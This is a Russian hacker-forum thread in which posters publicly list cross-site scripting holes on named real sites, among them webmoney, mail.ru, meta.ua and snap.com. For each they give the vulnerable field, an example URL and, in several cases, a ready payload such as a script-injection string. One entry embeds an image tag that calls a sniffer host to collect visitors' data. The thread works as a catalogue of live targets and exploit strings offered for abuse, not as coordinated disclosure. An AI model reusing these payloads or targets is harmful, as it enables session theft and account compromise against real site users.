Ладно, блин, убью я в паблик эту XSS: WebFile.Ru: при заливке файла в поле описания пишем код XSS. Пример: http://webfile.ru/placed?id=4029293
FILES.WYW.RY: При заливке файла в поле комментарии, а так-же при оставлении комvентария о файле Пример: Оставляем комментарий на странице http://files.wyw.ru/wyw_file?id=4061626 с содержимым <img src="http://media-task.ru/s/s.gif"> И смотрим сниффер http://media-task.ru/s
Нашел я, решил выкинуть в паблик))) Ресурс: Code: https://files.[B]webmoney.ru[/B]/ Изменяем имя папки на: Code: ;"><script>alert()</script>
http://www.daler.ru В коментах, в поле для ника. Пример: http://www.daler.ru/open/games/motorstorm/18597_5.html#c
http://torg.mail.ru/used/220783/?prev=1 открываем и.... =) если не сразу открылась страница , то пару раз нажмите ентер )
cyberarena.tv Регаем акк, заходим в него загружаем конфиг с таким содержанием: Code: <script>alert()</script> пример: _http://cyberarena.tv/profile.php?user=31337&task=getconfig
http://roses.tj/---->далее закладка " Guestbook " уязвимое поле : name : email : тест.сообщение так же уязвимы комменты у фото!
PHP: http://foto.meta.ua http://audio.meta.ua http://video.meta.ua Пример: http://foto.meta.ua/imgview.php?fid=2082370 Активная При создании комментария
http://www.freehostsfinder.com/ в коментариях к любому хостингу, например http://www.freehostsfinder.com/host-review/hosting_review.php?HostID=452 но на главной тоже работает, там снизу коменты последние выводятся -- там пофиксили чего то, хз. фильтр какойто поставили
http://www.ctatc.ru/registration.php Уязвимые поля Имя и Фамилия. XSS Выходит после активации аккаунта по e-mail'y. +++ http://www.ctatc.ru/index.htm Уязвимое поле Поисковая фраза +++ www.snap.com Поле Search Code: http://www.snap.com/classicsearch.php?pid=5d884d39449fd05ac20ea4827433f22f&ip=178.93.198.166&query=%3Cscript%3Ealert%28%2F%D0%BE%D0%BD%D1%82%D0%B5%D0%B4%D0%B0%D1%87%2F%29%3C%2Fscript%3E&submit_index.x=10&submit_index.y=16
Активка в данных юзера http://buhgalter-info.ru/user/info/0012dceb3c910d5f0df52aeb60679535/ Не знаю точно в каком поле т.к. Искал активку с телефона + xss ввел сразу в все поля p.s. сегодня посомтрел, активка в стране
Code: http://b2blogger.com/pressroom/register/ Уязвимые поля: Логин + пассивная в поиске Яндекс тИЦ (CY)=850 Google PageRank (PR)=5